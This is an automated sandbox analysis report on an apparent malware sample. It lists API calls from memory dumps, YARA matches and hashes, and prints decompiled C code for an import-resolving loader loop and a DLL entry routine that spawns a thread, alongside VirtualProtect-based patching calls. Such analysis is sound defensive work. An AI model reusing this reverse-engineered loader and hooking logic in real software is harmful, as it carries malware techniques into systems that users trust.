                                                                                                                                        0x73751ed8
                                                                                                                                        0x00000000
                                                                                                                                        0x73751ed8
                                                                                                                                        0x73751de3
                                                                                                                                        0x73751dea
                                                                                                                                        0x73751ded
                                                                                                                                        0x73751eca
                                                                                                                                        0x73751eca
                                                                                                                                        0x73751ed0
                                                                                                                                        0x73751ed2
                                                                                                                                        0x73751ed2
                                                                                                                                        0x00000000
                                                                                                                                        0x73751ed0
                                                                                                                                        0x73751df7
                                                                                                                                        0x73751e48
                                                                                                                                        0x73751e5a
                                                                                                                                        0x73751e60
                                                                                                                                        0x73751e64
                                                                                                                                        0x73751ec0
                                                                                                                                        0x73751ec6
                                                                                                                                        0x73751ec9
                                                                                                                                        0x00000000
                                                                                                                                        0x73751ec9
                                                                                                                                        0x73751e70
                                                                                                                                        0x73751e7e
                                                                                                                                        0x73751e86
                                                                                                                                        0x73751e8a
                                                                                                                                        0x73751e91
                                                                                                                                        0x73751e94
                                                                                                                                        0x73751e96
                                                                                                                                        0x73751e96
                                                                                                                                        0x73751e9e
                                                                                                                                        0x00000000
                                                                                                                                        0x73751ea0
                                                                                                                                        0x73751ea3
                                                                                                                                        0x73751eab
                                                                                                                                        0x73751eae
                                                                                                                                        0x73751eb5
                                                                                                                                        0x73751eb5
                                                                                                                                        0x73751ebc
                                                                                                                                        0x00000000
                                                                                                                                        0x73751ebc
                                                                                                                                        0x73751e9e
                                                                                                                                        0x73751e04
                                                                                                                                        0x73751e42
                                                                                                                                        0x00000000
                                                                                                                                        0x73751e42
                                                                                                                                        0x73751e06
                                                                                                                                        0x73751e09
                                                                                                                                        0x73751e12
                                                                                                                                        0x73751e14
                                                                                                                                        0x73751e18
                                                                                                                                        0x73751e3a
                                                                                                                                        0x73751e3a
                                                                                                                                        0x00000000
                                                                                                                                        0x73751e3a
                                                                                                                                        0x73751e1a
                                                                                                                                        0x73751e1f
                                                                                                                                        0x73751e26
                                                                                                                                        0x73751e2b
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73751e30
                                                                                                                                        0x73751e33
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 73751371: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,73751DA3), ref: 73751380
                                                                                                                                          • Part of subcall function 73751371: GetVersion.KERNEL32(?,73751DA3), ref: 7375138F
                                                                                                                                          • Part of subcall function 73751371: GetCurrentProcessId.KERNEL32(?,73751DA3), ref: 7375139E
                                                                                                                                          • Part of subcall function 73751371: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,73751DA3), ref: 737513B7
                                                                                                                                        • SwitchToThread.KERNEL32 ref: 73751DB1
                                                                                                                                          • Part of subcall function 7375123E: VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,?,?,-00000008,-00000008), ref: 73751294
                                                                                                                                          • Part of subcall function 7375123E: memcpy.NTDLL(?,?,-00000008,?,?,-00000008,-00000008,?,?,?,?,?,?,?,?,73751DC2), ref: 73751326
                                                                                                                                          • Part of subcall function 7375123E: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,-00000008,-00000008), ref: 73751341
                                                                                                                                        • Sleep.KERNELBASE(00000000,-00000008), ref: 73751DCD
                                                                                                                                        • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 73751E12
                                                                                                                                        • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 73751E30
                                                                                                                                        • CreateThread.KERNEL32 ref: 73751E5A
                                                                                                                                        • QueueUserAPC.KERNELBASE(73752058,00000000,?), ref: 73751E70
                                                                                                                                        • GetLastError.KERNEL32 ref: 73751E80
                                                                                                                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 73751E8A
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 73751E91
                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 73751E96
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 73751EA3
                                                                                                                                        • GetExitCodeThread.KERNELBASE(00000000,?), ref: 73751EB5
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 73751EBC
                                                                                                                                        • GetLastError.KERNEL32 ref: 73751EC0
                                                                                                                                        • GetLastError.KERNEL32 ref: 73751ED2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp Download File
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp Download File
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchTerminateUserVersionWaitmemcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3896949738-0
                                                                                                                                        • Opcode ID: 101335ffcfc5dec7b8ecdfdd8d870313ca19829c934a7337608ff2b8c5b2a742
                                                                                                                                        • Instruction ID: 8c49300953b11a0a48963d6ea5633f47a3ab8316ff04a8998d2a520fd9421d89
                                                                                                                                        • Opcode Fuzzy Hash: 101335ffcfc5dec7b8ecdfdd8d870313ca19829c934a7337608ff2b8c5b2a742
                                                                                                                                        • Instruction Fuzzy Hash: 3A319573900319ABDB1AEBB68C48F5F7ABEAF852537240115F84AD3150E7398901DBA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044106E, Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,?,?,?,00000000,?,00444163,?), ref: 004410BB
                                                                                                                                        • VirtualProtect.KERNELBASE(00000000,00000000,00000040,00000200,?,?,?,00000000,?,00444163,?), ref: 004410CD
                                                                                                                                        • lstrcpy.KERNEL32(00000000,?), ref: 004410DC
                                                                                                                                        • VirtualProtect.KERNELBASE(00000000,00000000,00000200,00000200,?,?,?,00000000,?,00444163,?), ref: 004410ED
                                                                                                                                        • VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000400,0046A4F8,00000018,004470C1,?,?,?,00000000,?,00444163,?,?), ref: 00441123
                                                                                                                                        • VirtualProtect.KERNELBASE(?,00000004,?,?,?,?,?,00000000,?,00444163,?,?,?,00000000,00000000), ref: 0044113E
                                                                                                                                        • VirtualProtect.KERNEL32(?,00000004,00000040,?,0046A4F8,00000018,004470C1,?,?,?,00000000,?,00444163,?,?,?), ref: 00441153
                                                                                                                                        • VirtualProtect.KERNELBASE(?,00000004,00000040,?,0046A4F8,00000018,004470C1,?,?,?,00000000,?,00444163,?,?,?), ref: 00441180
                                                                                                                                        • VirtualProtect.KERNELBASE(?,00000004,?,?,?,?,?,00000000,?,00444163,?,?,?,00000000,00000000), ref: 0044119A
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00000000,?,00444163,?,?,?,00000000,00000000), ref: 004411A1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3676034644-0
                                                                                                                                        • Opcode ID: 24b047f0f567902ae926f80ae15a8a81b6c2fc1a0c972a5fa3fa0a631be3605c
                                                                                                                                        • Instruction ID: 90d9e04f25dfc25ac7a0e80a618f8bea9885c15da1f953a63ab8278039af5b26
                                                                                                                                        • Opcode Fuzzy Hash: 24b047f0f567902ae926f80ae15a8a81b6c2fc1a0c972a5fa3fa0a631be3605c
                                                                                                                                        • Instruction Fuzzy Hash: EA4157715007099FEB319F65CC44EABB7F5FB08310F00861AE655A66B0E779E845CF19
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004479AD, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00441268: VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0044128D
                                                                                                                                          • Part of subcall function 00441268: GetLastError.KERNEL32 ref: 00441295
                                                                                                                                          • Part of subcall function 00441268: VirtualQuery.KERNEL32(?,?,0000001C), ref: 004412AC
                                                                                                                                          • Part of subcall function 00441268: VirtualProtect.KERNEL32(?,?,-4CD94B84,?), ref: 004412D1
                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000,?,0046A568,0000001C,0045E36B,00000002,00000000,00000001,?,?,?,00000000,?), ref: 00447B06
                                                                                                                                          • Part of subcall function 00445528: lstrlen.KERNEL32(?,?,?,?,004440F5), ref: 00445560
                                                                                                                                          • Part of subcall function 00445528: lstrcpy.KERNEL32(00000000,?), ref: 00445577
                                                                                                                                          • Part of subcall function 00445528: StrChrA.SHLWAPI(00000000,0000002E,?,?,004440F5), ref: 00445580
                                                                                                                                          • Part of subcall function 00445528: GetModuleHandleA.KERNEL32(00000000,?,?,004440F5), ref: 0044559E
                                                                                                                                        • VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,?,00000000,004440F5,00000000,?,00000000,?,0046A568,0000001C,0045E36B,00000002), ref: 00447A84
                                                                                                                                        • VirtualProtect.KERNELBASE(?,00000004,?,?,00000000,004440F5,00000000,?,00000000,?,0046A568,0000001C,0045E36B,00000002,00000000,00000001), ref: 00447A9F
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(0046E240), ref: 00447AC3
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(0046E240), ref: 00447AE1
                                                                                                                                          • Part of subcall function 00441268: SetLastError.KERNEL32(?), ref: 004412DA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                                                                                                                                        • String ID: $8F
                                                                                                                                        • API String ID: 899430048-3514273430
                                                                                                                                        • Opcode ID: d8a83db41a071bfdf86181a66141dd84a7444d561612baddb76918a478949ec6
                                                                                                                                        • Instruction ID: e69184858933d212faf20ed9f8564a2ae76be6da52a7e9ddaf7ec6699ac16e1b
                                                                                                                                        • Opcode Fuzzy Hash: d8a83db41a071bfdf86181a66141dd84a7444d561612baddb76918a478949ec6
                                                                                                                                        • Instruction Fuzzy Hash: 6741B275900605EFEB10DF65C848A9EBBF4FF04314F10821AF914AB250E778EA51CFA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00459BDC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(00000000,?,?,?,00000000,0046A578,00000018,0045EBA1,00000000,?,?,?,?,00000000), ref: 00459C1F
                                                                                                                                        • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,00000000,?,?,?,00000000,0046A578,00000018,0045EBA1,00000000,?,?), ref: 00459CAA
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(0046E240), ref: 00459CD2
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(0046E240), ref: 00459CF0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                                                                                                                                        • String ID: 8F
                                                                                                                                        • API String ID: 3666628472-3652835401
                                                                                                                                        • Opcode ID: 386712c481c3545a3610468fb3213ed342556be166252ac2590ffe56cf8fd597
                                                                                                                                        • Instruction ID: fdc030bc546f047fbbc0d08b847eb292960ef5b6477c6f4ec08aff77f9197d6d
                                                                                                                                        • Opcode Fuzzy Hash: 386712c481c3545a3610468fb3213ed342556be166252ac2590ffe56cf8fd597
                                                                                                                                        • Instruction Fuzzy Hash: F5416270900605EFDB11DF66C88499EBBF4FF48301B10492BE815E7251D778AE45CFA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 73751BCD, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104librarystringloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E73751BCD(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed short _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				_Unknown_base(*)()* _v24;
				intOrPtr _t34;
				intOrPtr _t36;
				struct HINSTANCE__* _t37;
				intOrPtr _t40;
				CHAR* _t44;
				_Unknown_base(*)()* _t45;
				intOrPtr* _t52;
				intOrPtr _t53;
				signed short _t54;
				intOrPtr* _t57;
				signed short _t59;
				CHAR* _t60;
				CHAR* _t62;
				signed short* _t64;
				void* _t65;
				signed short _t72;

				_t34 =  *((intOrPtr*)(_a8 + 0x80));
				_v8 = _v8 & 0x00000000;
				_t52 = _a4;
				if(_t34 == 0) {
					L28:
					return _v8;
				}
				_t57 = _t34 + _t52;
				_t36 =  *((intOrPtr*)(_t57 + 0xc));
				_a4 = _t57;
				if(_t36 == 0) {
					L27:
					goto L28;
				}
				while(1) {
					_t62 = _t36 + _t52;
					_t37 = LoadLibraryA(_t62); // executed
					_v16 = _t37;
					if(_t37 == 0) {
						break;
					}
					_v12 = _v12 & 0x00000000;
					memset(_t62, 0, lstrlenA(_t62));
					_t53 =  *_t57;
					_t40 =  *((intOrPtr*)(_t57 + 0x10));
					_t65 = _t65 + 0xc;
					if(_t53 != 0) {
						L6:
						_t64 = _t53 + _t52;
						_t54 =  *_t64;
						if(_t54 == 0) {
							L23:
							_t36 =  *((intOrPtr*)(_t57 + 0x20));
							_t57 = _t57 + 0x14;
							_a4 = _t57;
							if(_t36 != 0) {
								continue;
							}
							L26:
							goto L27;
						}
						_v20 = _t40 - _t64 + _t52;
						_t72 = _t54;
						L8:
						L8:
						if(_t72 < 0) {
							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
								_t59 = 0;
								_v12 =  *_t64 & 0x0000ffff;
							} else {
								_t59 = _t54;
							}
						} else {
							_t59 = _t54 + _t52;
						}
						_t20 = _t59 + 2; // 0x2
						_t44 = _t20;
						if(_t59 == 0) {
							_t44 = _v12 & 0x0000ffff;
						}
						_t45 = GetProcAddress(_v16, _t44);
						_v24 = _t45;
						if(_t45 == 0) {
							goto L21;
						}
						if(_t59 != 0) {
							_t60 = _t59 + 2;
							memset(_t60, 0, lstrlenA(_t60));
							_t65 = _t65 + 0xc;
						}
						 *(_v20 + _t64) = _v24;
						_t64 =  &(_t64[2]);
						_t54 =  *_t64;
						if(_t54 != 0) {
							goto L8;
						} else {
							L22:
							_t57 = _a4;
							goto L23;
						}
						L21:
						_v8 = 0x7f;
						goto L22;
					}
					_t53 = _t40;
					if(_t40 == 0) {
						goto L23;
					}
					goto L6;
				}
				_v8 = 0x7e;
				goto L26;
			}
























                                                                                                                                        0x73751bd6
                                                                                                                                        0x73751bdc
                                                                                                                                        0x73751be3
                                                                                                                                        0x73751be6
                                                                                                                                        0x73751ce7
                                                                                                                                        0x73751cec
                                                                                                                                        0x73751cec
                                                                                                                                        0x73751bed
                                                                                                                                        0x73751bf0
                                                                                                                                        0x73751bf5
                                                                                                                                        0x73751bf8
                                                                                                                                        0x73751ce6
                                                                                                                                        0x00000000
                                                                                                                                        0x73751ce6
                                                                                                                                        0x73751bff
                                                                                                                                        0x73751bff
                                                                                                                                        0x73751c03
                                                                                                                                        0x73751c0b
                                                                                                                                        0x73751c0e
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73751c14
                                                                                                                                        0x73751c23
                                                                                                                                        0x73751c28
                                                                                                                                        0x73751c2a
                                                                                                                                        0x73751c2d
                                                                                                                                        0x73751c32
                                                                                                                                        0x73751c3e
                                                                                                                                        0x73751c3e
                                                                                                                                        0x73751c41
                                                                                                                                        0x73751c45
                                                                                                                                        0x73751ccb
                                                                                                                                        0x73751ccb
                                                                                                                                        0x73751cce
                                                                                                                                        0x73751cd3
                                                                                                                                        0x73751cd6
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73751ce5
                                                                                                                                        0x00000000
                                                                                                                                        0x73751ce5
                                                                                                                                        0x73751c4f
                                                                                                                                        0x73751c52
                                                                                                                                        0x00000000
                                                                                                                                        0x73751c54
                                                                                                                                        0x73751c54
                                                                                                                                        0x73751c5d
                                                                                                                                        0x73751c72
                                                                                                                                        0x73751c74
                                                                                                                                        0x73751c6b
                                                                                                                                        0x73751c6b
                                                                                                                                        0x73751c6b
                                                                                                                                        0x73751c56
                                                                                                                                        0x73751c56
                                                                                                                                        0x73751c56
                                                                                                                                        0x73751c79
                                                                                                                                        0x73751c79
                                                                                                                                        0x73751c7c
                                                                                                                                        0x73751c7e
                                                                                                                                        0x73751c7e
                                                                                                                                        0x73751c86
                                                                                                                                        0x73751c8e
                                                                                                                                        0x73751c91
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73751c95
                                                                                                                                        0x73751c97
                                                                                                                                        0x73751ca5
                                                                                                                                        0x73751caa
                                                                                                                                        0x73751caa
                                                                                                                                        0x73751cb3
                                                                                                                                        0x73751cb6
                                                                                                                                        0x73751cb9
                                                                                                                                        0x73751cbd
                                                                                                                                        0x00000000
                                                                                                                                        0x73751cbf
                                                                                                                                        0x73751cc8
                                                                                                                                        0x73751cc8
                                                                                                                                        0x00000000
                                                                                                                                        0x73751cc8
                                                                                                                                        0x73751cc1
                                                                                                                                        0x73751cc1
                                                                                                                                        0x00000000
                                                                                                                                        0x73751cc1
                                                                                                                                        0x73751c36
                                                                                                                                        0x73751c38
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73751c38
                                                                                                                                        0x73751cde
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNELBASE(00000002,00000002,?,00000000,?,?,00000002), ref: 73751C03
                                                                                                                                        • lstrlenA.KERNEL32(00000002), ref: 73751C19
                                                                                                                                        • memset.NTDLL ref: 73751C23
                                                                                                                                        • GetProcAddress.KERNEL32(?,00000002), ref: 73751C86
                                                                                                                                        • lstrlenA.KERNEL32(-00000002), ref: 73751C9B
                                                                                                                                        • memset.NTDLL ref: 73751CA5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp Download File
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp Download File
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlenmemset$AddressLibraryLoadProc
                                                                                                                                        • String ID: ~
                                                                                                                                        • API String ID: 1986585659-1707062198
                                                                                                                                        • Opcode ID: cba98b1490a177697a8782c8dc28b2deb9aeb02dda2e134e4c2916803b928667
                                                                                                                                        • Instruction ID: 39bdc313f8a980a47428dbc49f74e01763e3a7a19869517743ddea74acc61258
                                                                                                                                        • Opcode Fuzzy Hash: cba98b1490a177697a8782c8dc28b2deb9aeb02dda2e134e4c2916803b928667
                                                                                                                                        • Instruction Fuzzy Hash: D8318C72A00205AFDF19DF59C985BAEB7F5BF44216F21406DF80AEB240E736EA41DB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00443C78, Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00462557: GetProcAddress.KERNEL32(6F57775A,00000318), ref: 0046257C
                                                                                                                                          • Part of subcall function 00462557: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 00462598
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00443CB1
                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00443D9C
                                                                                                                                          • Part of subcall function 00462557: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 00462702
                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 00443CE7
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00443CF3
                                                                                                                                        • lstrcmpi.KERNEL32(?,00000000), ref: 00443D30
                                                                                                                                        • StrChrA.SHLWAPI(?,0000002E), ref: 00443D39
                                                                                                                                        • lstrcmpi.KERNEL32(?,00000000), ref: 00443D4B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3901270786-0
                                                                                                                                        • Opcode ID: 7fc3b20866ef05f80dc7735befcca6849fef0455ec07040ecec385e984b47ef5
                                                                                                                                        • Instruction ID: 3892bce291c124798951be46d0a2af21cdd47d5ddb7df27decd410c5a3ea9237
                                                                                                                                        • Opcode Fuzzy Hash: 7fc3b20866ef05f80dc7735befcca6849fef0455ec07040ecec385e984b47ef5
                                                                                                                                        • Instruction Fuzzy Hash: BD317171504311ABE3218F15DC44B5BBBE8FF89B55F100A1EF88466280D778EE44CBAA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045F696, Relevance: 10.6, APIs: 7, Instructions: 80sleepthreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00446498: memset.NTDLL ref: 004464A2
                                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,00000000,00000000,?,00452CAC), ref: 0045F726
                                                                                                                                        • SetEvent.KERNEL32(00000000,?,00452CAC), ref: 0045F733
                                                                                                                                        • Sleep.KERNEL32(00000BB8,?,00452CAC), ref: 0045F73E
                                                                                                                                        • ResetEvent.KERNEL32(00000000,?,00452CAC), ref: 0045F745
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00452CAC), ref: 0045F74C
                                                                                                                                        • GetShellWindow.USER32 ref: 0045F757
                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0045F75E
                                                                                                                                          • Part of subcall function 00457655: RegCloseKey.ADVAPI32(?), ref: 004576D8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 53838381-0
                                                                                                                                        • Opcode ID: 3769b02c1fae3e31287f24acd0d35a155c857c00b93d159238f1a75b20c050d3
                                                                                                                                        • Instruction ID: afba4bfa1f2a8db0c25da631aad832ee2da103837217c8c1388305c37a969157
                                                                                                                                        • Opcode Fuzzy Hash: 3769b02c1fae3e31287f24acd0d35a155c857c00b93d159238f1a75b20c050d3
                                                                                                                                        • Instruction Fuzzy Hash: 07210736100210ABD7107B67EC89D6B7BADEBC9716B05443EF90583252EBB86809D77F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 737514CB, Relevance: 10.6, APIs: 7, Instructions: 74memorythreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                        			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x73754108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x7375410c;
						if( *0x7375410c != 0) {
							_t36 = 0x2710;
							while(1) {
								SleepEx(0x64, 1); // executed
								__eflags =  *0x73754118;
								if( *0x73754118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x7375410c);
						}
						HeapDestroy( *0x73754110); // executed
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x73754108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x73754110 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x73754130 = _a4;
							asm("lock xadd [eax], ebx");
							_t23 = CreateThread(0, 0, E73751359, E73751F8A(_a12, 0, 0x73754118, _t41), 0,  &_a8); // executed
							 *0x7375410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                                                                                                                        0x737514ce
                                                                                                                                        0x737514da
                                                                                                                                        0x737514dc
                                                                                                                                        0x737514df
                                                                                                                                        0x73751559
                                                                                                                                        0x7375155f
                                                                                                                                        0x73751561
                                                                                                                                        0x73751563
                                                                                                                                        0x73751569
                                                                                                                                        0x7375156b
                                                                                                                                        0x73751570
                                                                                                                                        0x73751573
                                                                                                                                        0x7375157e
                                                                                                                                        0x73751580
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73751582
                                                                                                                                        0x73751585
                                                                                                                                        0x73751587
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73751587
                                                                                                                                        0x7375158f
                                                                                                                                        0x7375158f
                                                                                                                                        0x7375159b
                                                                                                                                        0x7375159b
                                                                                                                                        0x737514e1
                                                                                                                                        0x737514e2
                                                                                                                                        0x73751502
                                                                                                                                        0x73751508
                                                                                                                                        0x7375150a
                                                                                                                                        0x7375150f
                                                                                                                                        0x7375154f
                                                                                                                                        0x7375154f
                                                                                                                                        0x73751511
                                                                                                                                        0x73751519
                                                                                                                                        0x73751520
                                                                                                                                        0x73751539
                                                                                                                                        0x73751541
                                                                                                                                        0x73751546
                                                                                                                                        0x7375154b
                                                                                                                                        0x00000000
                                                                                                                                        0x7375154b
                                                                                                                                        0x73751546
                                                                                                                                        0x7375150f
                                                                                                                                        0x737514e2
                                                                                                                                        0x737515a8

                                                                                                                                        APIs
                                                                                                                                        • InterlockedIncrement.KERNEL32(73754108), ref: 737514ED
                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 73751502
                                                                                                                                        • CreateThread.KERNEL32 ref: 73751539
                                                                                                                                        • InterlockedDecrement.KERNEL32(73754108), ref: 73751559
                                                                                                                                        • SleepEx.KERNELBASE(00000064,00000001), ref: 73751573
                                                                                                                                        • CloseHandle.KERNEL32 ref: 7375158F
                                                                                                                                        • HeapDestroy.KERNELBASE ref: 7375159B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp Download File
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp Download File
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3416589138-0
                                                                                                                                        • Opcode ID: 1f091eee6d3473a8f9bb1443170e707b9145b69cd1428f336acfe94e57f72980
                                                                                                                                        • Instruction ID: ff187a91487366efa2a37cdaed62c381da3661d85a849fb199198d3ccd5c9b9b
                                                                                                                                        • Opcode Fuzzy Hash: 1f091eee6d3473a8f9bb1443170e707b9145b69cd1428f336acfe94e57f72980
                                                                                                                                        • Instruction Fuzzy Hash: A2218A33900216AFEB09AF6BCC85B597BBAFB556527354115F45FD3290DB3989008F50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00463F70, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044EA3B: lstrlen.KERNEL32(?,00000000,00450A89,00000027,0046E0F8,?,00000000,?,?,00450A89,Local\,00000001,?,0046088E,?,00000000), ref: 0044EA71
                                                                                                                                          • Part of subcall function 0044EA3B: lstrcpy.KERNEL32(00000000,00000000), ref: 0044EA95
                                                                                                                                          • Part of subcall function 0044EA3B: lstrcat.KERNEL32(00000000,00000000), ref: 0044EA9D
